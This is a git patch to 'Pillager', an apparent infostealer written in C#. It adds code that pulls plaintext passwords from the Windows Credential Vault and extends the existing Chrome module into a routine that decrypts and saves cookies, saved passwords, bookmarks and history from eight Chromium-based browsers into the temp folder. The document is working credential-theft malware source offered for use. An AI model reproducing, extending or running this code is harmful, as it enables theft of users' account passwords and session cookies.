From 3288f9878cb37c864e37101e2323dae5a47a0aea Mon Sep 17 00:00:00 2001 From: qwqdanchun <287182701@qq.com> Date: Mon, 24 Apr 2023 23:38:01 +0800 Subject: [PATCH] update --- Pillager/{ => Browsers}/Chrome.cs | 29 ++- Pillager/Browsers/IE.cs | 278 +++++++++++++++++++++++++ Pillager/{ => Helper}/AesGcm.cs | 4 +- Pillager/{ => Helper}/BCrypt.cs | 5 +- Pillager/{ => Helper}/SQLiteHandler.cs | 3 +- Pillager/Helper/VaultCli.cs | 100 +++++++++ Pillager/Pillager.csproj | 10 +- Pillager/Program.cs | 42 ++-- 8 files changed, 437 insertions(+), 34 deletions(-) rename Pillager/{ => Browsers}/Chrome.cs (87%) create mode 100644 Pillager/Browsers/IE.cs rename Pillager/{ => Helper}/AesGcm.cs (98%) rename Pillager/{ => Helper}/BCrypt.cs (98%) rename Pillager/{ => Helper}/SQLiteHandler.cs (99%) create mode 100644 Pillager/Helper/VaultCli.cs diff --git a/Pillager/Chrome.cs b/Pillager/Browsers/Chrome.cs similarity index 87% rename from Pillager/Chrome.cs rename to Pillager/Browsers/Chrome.cs index 327e1e7..5340390 100644 --- a/Pillager/Chrome.cs +++ b/Pillager/Browsers/Chrome.cs @@ -1,11 +1,11 @@ using System; -using System.Collections.Generic; using System.IO; using System.Linq; using System.Security.Cryptography; using System.Text; +using Pillager.Helper; -namespace Pillager +namespace Pillager.Browsers { public class Chrome { @@ -26,7 +26,7 @@ namespace Pillager { string filePath = Path.Combine(Directory.GetParent(BrowserPath).FullName, "Local State"); byte[] masterKey = new byte[] { }; - if (File.Exists(filePath) == false) + if (!File.Exists(filePath)) return null; var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath)); foreach (System.Text.RegularExpressions.Match prof in pattern) @@ -71,7 +71,7 @@ namespace Pillager return decryptedData; } - internal string Chrome_passwords() + public string Chrome_passwords() { StringBuilder passwords = new StringBuilder(); string loginDataPath = Path.Combine(BrowserPath, "Login Data"); @@ -141,8 +141,6 @@ namespace Pillager return history.ToString(); ; } - - public string Chrome_cookies() { StringBuilder cookies = new StringBuilder(); @@ -177,7 +175,6 @@ namespace Pillager return cookies.ToString(); } - public string Chrome_books() { StringBuilder stringBuilder = new StringBuilder(); @@ -188,5 +185,23 @@ namespace Pillager } return stringBuilder.ToString(); } + + public void Save(string path) + { + if (MasterKey==null) + { + return; + } + string savepath = Path.Combine(path, BrowserName); + Directory.CreateDirectory(savepath); + string cookies = Chrome_cookies(); + string passwords = Chrome_passwords(); + string books = Chrome_books(); + string history = Chrome_history(); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_cookies.txt"), cookies); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history); + } } } diff --git a/Pillager/Browsers/IE.cs b/Pillager/Browsers/IE.cs new file mode 100644 index 0000000..19ebd4e --- /dev/null +++ b/Pillager/Browsers/IE.cs @@ -0,0 +1,278 @@ +using Microsoft.Win32; +using Pillager.Helper; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Reflection; +using System.Runtime.InteropServices; +using System.Text; +using System.Text.RegularExpressions; + +namespace Pillager.Browsers +{ + public static class IE + { + public static string BrowserName = "IE"; + public static string IE_passwords() + { + StringBuilder sb = new StringBuilder(); + var OSVersion = Environment.OSVersion.Version; + var OSMajor = OSVersion.Major; + var OSMinor = OSVersion.Minor; + + Type VAULT_ITEM; + + if (OSMajor >= 6 && OSMinor >= 2) + { + VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN8); + } + else + { + VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN7); + } + + /* Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct */ + object GetVaultElementValue(IntPtr vaultElementPtr) + { + object results; + object partialElement = System.Runtime.InteropServices.Marshal.PtrToStructure(vaultElementPtr, typeof(VaultCli.VAULT_ITEM_ELEMENT)); + FieldInfo partialElementInfo = partialElement.GetType().GetField("Type"); + var partialElementType = partialElementInfo.GetValue(partialElement); + + IntPtr elementPtr = (IntPtr)(vaultElementPtr.ToInt64() + 16); + switch ((int)partialElementType) + { + case 7: // VAULT_ELEMENT_TYPE == String; These are the plaintext passwords! + IntPtr StringPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr); + results = System.Runtime.InteropServices.Marshal.PtrToStringUni(StringPtr); + break; + case 0: // VAULT_ELEMENT_TYPE == bool + results = System.Runtime.InteropServices.Marshal.ReadByte(elementPtr); + results = (bool)results; + break; + case 1: // VAULT_ELEMENT_TYPE == Short + results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr); + break; + case 2: // VAULT_ELEMENT_TYPE == Unsigned Short + results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr); + break; + case 3: // VAULT_ELEMENT_TYPE == Int + results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr); + break; + case 4: // VAULT_ELEMENT_TYPE == Unsigned Int + results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr); + break; + case 5: // VAULT_ELEMENT_TYPE == Double + results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Double)); + break; + case 6: // VAULT_ELEMENT_TYPE == GUID + results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Guid)); + break; + case 12: // VAULT_ELEMENT_TYPE == Sid + IntPtr sidPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr); + var sidObject = new System.Security.Principal.SecurityIdentifier(sidPtr); + results = sidObject.Value; + break; + default: + /* Several VAULT_ELEMENT_TYPES are currently unimplemented according to + * Lord Graeber. Thus we do not implement them. */ + results = null; + break; + } + return results; + } + /* End helper function */ + + Int32 vaultCount = 0; + IntPtr vaultGuidPtr = IntPtr.Zero; + var result = VaultCli.VaultEnumerateVaults(0, ref vaultCount, ref vaultGuidPtr); + + //var result = CallVaultEnumerateVaults(VaultEnum, 0, ref vaultCount, ref vaultGuidPtr); + + if ((int)result != 0) + { + throw new Exception("[ERROR] Unable to enumerate vaults. Error (0x" + result.ToString() + ")"); + } + + // Create dictionary to translate Guids to human readable elements + IntPtr guidAddress = vaultGuidPtr; + Dictionary vaultSchema = new Dictionary(); + vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note"); + vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential"); + vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector"); + vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials"); + vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials"); + vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential"); + vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential"); + vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential"); + vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null); + + for (int i = 0; i < vaultCount; i++) + { + // Open vault block + object vaultGuidString = System.Runtime.InteropServices.Marshal.PtrToStructure(guidAddress, typeof(Guid)); + Guid vaultGuid = new Guid(vaultGuidString.ToString()); + guidAddress = (IntPtr)(guidAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(typeof(Guid))); + IntPtr vaultHandle = IntPtr.Zero; + string vaultType; + if (vaultSchema.ContainsKey(vaultGuid)) + { + vaultType = vaultSchema[vaultGuid]; + } + else + { + vaultType = vaultGuid.ToString(); + } + result = VaultCli.VaultOpenVault(ref vaultGuid, (UInt32)0, ref vaultHandle); + if (result != 0) + { + throw new Exception("Unable to open the following vault: " + vaultType + ". Error: 0x" + result.ToString()); + } + // Vault opened successfully! Continue. + + // Fetch all items within Vault + int vaultItemCount = 0; + IntPtr vaultItemPtr = IntPtr.Zero; + result = VaultCli.VaultEnumerateItems(vaultHandle, 512, ref vaultItemCount, ref vaultItemPtr); + if (result != 0) + { + throw new Exception("[ERROR] Unable to enumerate vault items from the following vault: " + vaultType + ". Error 0x" + result.ToString()); + } + var structAddress = vaultItemPtr; + if (vaultItemCount > 0) + { + // For each vault item... + for (int j = 1; j <= vaultItemCount; j++) + { + // Begin fetching vault item... + var currentItem = System.Runtime.InteropServices.Marshal.PtrToStructure(structAddress, VAULT_ITEM); + structAddress = (IntPtr)(structAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(VAULT_ITEM)); + + IntPtr passwordVaultItem = IntPtr.Zero; + // Field Info retrieval + FieldInfo schemaIdInfo = currentItem.GetType().GetField("SchemaId"); + Guid schemaId = new Guid(schemaIdInfo.GetValue(currentItem).ToString()); + FieldInfo pResourceElementInfo = currentItem.GetType().GetField("pResourceElement"); + IntPtr pResourceElement = (IntPtr)pResourceElementInfo.GetValue(currentItem); + FieldInfo pIdentityElementInfo = currentItem.GetType().GetField("pIdentityElement"); + IntPtr pIdentityElement = (IntPtr)pIdentityElementInfo.GetValue(currentItem); + FieldInfo dateTimeInfo = currentItem.GetType().GetField("LastModified"); + UInt64 lastModified = (UInt64)dateTimeInfo.GetValue(currentItem); + + object[] vaultGetItemArgs; + IntPtr pPackageSid = IntPtr.Zero; + if (OSMajor >= 6 && OSMinor >= 2) + { + // Newer versions have package sid + FieldInfo pPackageSidInfo = currentItem.GetType().GetField("pPackageSid"); + pPackageSid = (IntPtr)pPackageSidInfo.GetValue(currentItem); + result = VaultCli.VaultGetItem_WIN8(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, pPackageSid, IntPtr.Zero, 0, ref passwordVaultItem); + } + else + { + result = VaultCli.VaultGetItem_WIN7(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, IntPtr.Zero, 0, ref passwordVaultItem); + } + + if (result != 0) + { + throw new Exception("Error occured while retrieving vault item. Error: 0x" + result.ToString()); + } + object passwordItem = System.Runtime.InteropServices.Marshal.PtrToStructure(passwordVaultItem, VAULT_ITEM); + FieldInfo pAuthenticatorElementInfo = passwordItem.GetType().GetField("pAuthenticatorElement"); + IntPtr pAuthenticatorElement = (IntPtr)pAuthenticatorElementInfo.GetValue(passwordItem); + // Fetch the credential from the authenticator element + object cred = GetVaultElementValue(pAuthenticatorElement); + object packageSid = null; + if (pPackageSid != IntPtr.Zero && pPackageSid != null) + { + packageSid = GetVaultElementValue(pPackageSid); + } + if (cred != null) // Indicates successful fetch + { + sb.AppendLine("\tVault Type : {"+ vaultType + "}"); + object resource = GetVaultElementValue(pResourceElement); + if (resource != null) + { + sb.AppendLine("\tVault Type : {" + resource + "}"); + } + object identity = GetVaultElementValue(pIdentityElement); + if (identity != null) + { + sb.AppendLine("\tVault Type : {" + identity + "}"); + } + if (packageSid != null) + { + sb.AppendLine("\tVault Type : {" + packageSid + "}"); + } + sb.AppendLine("\tVault Type : {" + cred + "}"); + // Stupid datetime + sb.AppendLine("\tLastModified : {"+ DateTime.FromFileTimeUtc((long)lastModified) + "}"); + sb.AppendLine(); + } + } + } + } + + return sb.ToString(); + } + + public static string IE_history() + { + StringBuilder sb = new StringBuilder(); + RegistryKey myreg = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Explorer\\TypedURLs"); + string[] urls = new string[26]; + + for (int i = 1; i < 26; i++) + { + try + { + urls[i] = myreg.GetValue("url" + i.ToString()).ToString(); + } + catch { } + } + foreach (string url in urls) + { + if (url != null) + { + sb.AppendLine(url); + } + } + return sb.ToString(); + } + + public static string IE_books() + { + StringBuilder sb = new StringBuilder(); + string book_path = Environment.GetFolderPath(Environment.SpecialFolder.Favorites); + + string[] files = Directory.GetFiles(book_path, "*.url", SearchOption.AllDirectories); + + foreach (string url_file_path in files) + { + if (File.Exists(url_file_path) == true) + { + string booktext = File.ReadAllText(url_file_path); + Match match = Regex.Match(booktext, @"URL=(.*?)\n"); + sb.AppendLine($"\t{url_file_path}"); + sb.AppendLine($"\t\t{match.Value}"); + + } + } + + return sb.ToString(); + } + + public static void Save(string path) + { + string savepath = Path.Combine(path, BrowserName); + Directory.CreateDirectory(savepath); + string passwords = IE_passwords(); + string books = IE_books(); + string history = IE_history(); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history); + } + } +} \ No newline at end of file diff --git a/Pillager/AesGcm.cs b/Pillager/Helper/AesGcm.cs similarity index 98% rename from Pillager/AesGcm.cs rename to Pillager/Helper/AesGcm.cs index a8d5cdc..583a720 100644 --- a/Pillager/AesGcm.cs +++ b/Pillager/Helper/AesGcm.cs @@ -1,11 +1,9 @@ using System; -using System.Collections.Generic; -using System.Linq; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; -namespace Pillager +namespace Pillager.Helper { //AES GCM from https://github.com/dvsekhvalnov/jose-jwt internal class AesGcm diff --git a/Pillager/BCrypt.cs b/Pillager/Helper/BCrypt.cs similarity index 98% rename from Pillager/BCrypt.cs rename to Pillager/Helper/BCrypt.cs index c6789f0..5ff75dc 100644 --- a/Pillager/BCrypt.cs +++ b/Pillager/Helper/BCrypt.cs @@ -1,10 +1,7 @@ using System; -using System.Collections.Generic; -using System.Linq; using System.Runtime.InteropServices; -using System.Text; -namespace Pillager +namespace Pillager.Helper { public static class BCrypt { diff --git a/Pillager/SQLiteHandler.cs b/Pillager/Helper/SQLiteHandler.cs similarity index 99% rename from Pillager/SQLiteHandler.cs rename to Pillager/Helper/SQLiteHandler.cs index 15f1689..e7059af 100644 --- a/Pillager/SQLiteHandler.cs +++ b/Pillager/Helper/SQLiteHandler.cs @@ -1,11 +1,10 @@ using System; using System.Collections.Generic; using System.IO; -using System.Linq; using System.Runtime.InteropServices; using System.Text; -namespace Pillager +namespace Pillager.Helper { public class SQLiteHandler { diff --git a/Pillager/Helper/VaultCli.cs b/Pillager/Helper/VaultCli.cs new file mode 100644 index 0000000..fb71893 --- /dev/null +++ b/Pillager/Helper/VaultCli.cs @@ -0,0 +1,100 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Runtime.InteropServices; +using System.Text; + +namespace Pillager.Helper +{ + public static class VaultCli + { + public enum VAULT_ELEMENT_TYPE : Int32 + { + Undefined = -1, + Boolean = 0, + Short = 1, + UnsignedShort = 2, + Int = 3, + UnsignedInt = 4, + Double = 5, + Guid = 6, + String = 7, + ByteArray = 8, + TimeStamp = 9, + ProtectedArray = 10, + Attribute = 11, + Sid = 12, + Last = 13 + } + + public enum VAULT_SCHEMA_ELEMENT_ID : Int32 + { + Illegal = 0, + Resource = 1, + Identity = 2, + Authenticator = 3, + Tag = 4, + PackageSid = 5, + AppStart = 100, + AppEnd = 10000 + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)] + public struct VAULT_ITEM_WIN8 + { + public Guid SchemaId; + public IntPtr pszCredentialFriendlyName; + public IntPtr pResourceElement; + public IntPtr pIdentityElement; + public IntPtr pAuthenticatorElement; + public IntPtr pPackageSid; + public UInt64 LastModified; + public UInt32 dwFlags; + public UInt32 dwPropertiesCount; + public IntPtr pPropertyElements; + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)] + public struct VAULT_ITEM_WIN7 + { + public Guid SchemaId; + public IntPtr pszCredentialFriendlyName; + public IntPtr pResourceElement; + public IntPtr pIdentityElement; + public IntPtr pAuthenticatorElement; + public UInt64 LastModified; + public UInt32 dwFlags; + public UInt32 dwPropertiesCount; + public IntPtr pPropertyElements; + } + + [StructLayout(LayoutKind.Explicit, CharSet = CharSet.Ansi)] + public struct VAULT_ITEM_ELEMENT + { + [FieldOffset(0)] public VAULT_SCHEMA_ELEMENT_ID SchemaElementId; + [FieldOffset(8)] public VAULT_ELEMENT_TYPE Type; + } + + [DllImport("vaultcli.dll")] + public extern static Int32 VaultOpenVault(ref Guid vaultGuid, UInt32 offset, ref IntPtr vaultHandle); + + [DllImport("vaultcli.dll")] + public extern static Int32 VaultCloseVault(ref IntPtr vaultHandle); + + [DllImport("vaultcli.dll")] + public extern static Int32 VaultFree(ref IntPtr vaultHandle); + + [DllImport("vaultcli.dll")] + public extern static Int32 VaultEnumerateVaults(Int32 offset, ref Int32 vaultCount, ref IntPtr vaultGuid); + + [DllImport("vaultcli.dll")] + public extern static Int32 VaultEnumerateItems(IntPtr vaultHandle, Int32 chunkSize, ref Int32 vaultItemCount, ref IntPtr vaultItem); + + [DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")] + public extern static Int32 VaultGetItem_WIN8(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr pPackageSid, IntPtr zero, Int32 arg6, ref IntPtr passwordVaultPtr); + + [DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")] + public extern static Int32 VaultGetItem_WIN7(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr zero, Int32 arg5, ref IntPtr passwordVaultPtr); + + } +} diff --git a/Pillager/Pillager.csproj b/Pillager/Pillager.csproj index aae231e..d3e7009 100644 --- a/Pillager/Pillager.csproj +++ b/Pillager/Pillager.csproj @@ -41,12 +41,14 @@ - - - + + + + + - + \ No newline at end of file diff --git a/Pillager/Program.cs b/Pillager/Program.cs index cd922e0..b08cd70 100644 --- a/Pillager/Program.cs +++ b/Pillager/Program.cs @@ -1,8 +1,8 @@ using System; +using System.Collections; using System.Collections.Generic; using System.IO; -using System.Linq; -using System.Text; +using Pillager.Browsers; namespace Pillager { @@ -11,18 +11,32 @@ namespace Pillager static void Main(string[] args) { string savepath = Path.GetTempPath(); - string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), - "Google\\Chrome\\User Data\\Default"); - Chrome chrome = new Chrome("Chrome", chromepath); - string cookies = chrome.Chrome_cookies(); - string passwords = chrome.Chrome_passwords(); - string books = chrome.Chrome_books(); - string history = chrome.Chrome_history(); - File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_cookies.txt"), cookies); - File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_passwords.txt"), passwords); - File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_books.txt"), books); - File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_history.txt"), history); - Console.WriteLine("Files wrote to " + savepath + chrome.BrowserName + "_*.txt"); + + //IE + IE.Save(savepath); + Console.WriteLine("Files wrote to " + savepath + IE.BrowserName + "\\"); + + //Chrome + List> browserOnChromium = new List>() + { + new List() { "Chrome", "Google\\Chrome\\User Data\\Default" } , + new List() { "Chrome Beta", "Google\\Chrome Beta\\User Data\\Default" } , + new List() { "Chromium", "Chromium\\User Data\\Default" } , + new List() { "Edge", "Microsoft\\Edge\\User Data\\Default" } , + new List() { "Brave-Browse", "BraveSoftware\\Brave-Browser\\User Data\\Default" } , + new List() { "QQBrowser", "Tencent\\QQBrowser\\User Data\\Default" } , + new List() { "Vivaldi", "Vivaldi\\User Data\\Default" } , + new List() { "CocCoc", "CocCoc\\Browser\\User Data\\Default" } + //new List() { "", "" } , + }; + foreach (List browser in browserOnChromium) + { + string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), + browser[1]); + Chrome chrome = new Chrome(browser[0], chromepath); + chrome.Save(savepath); + Console.WriteLine("Files wrote to " + savepath + chrome.BrowserName + "\\"); + } } } }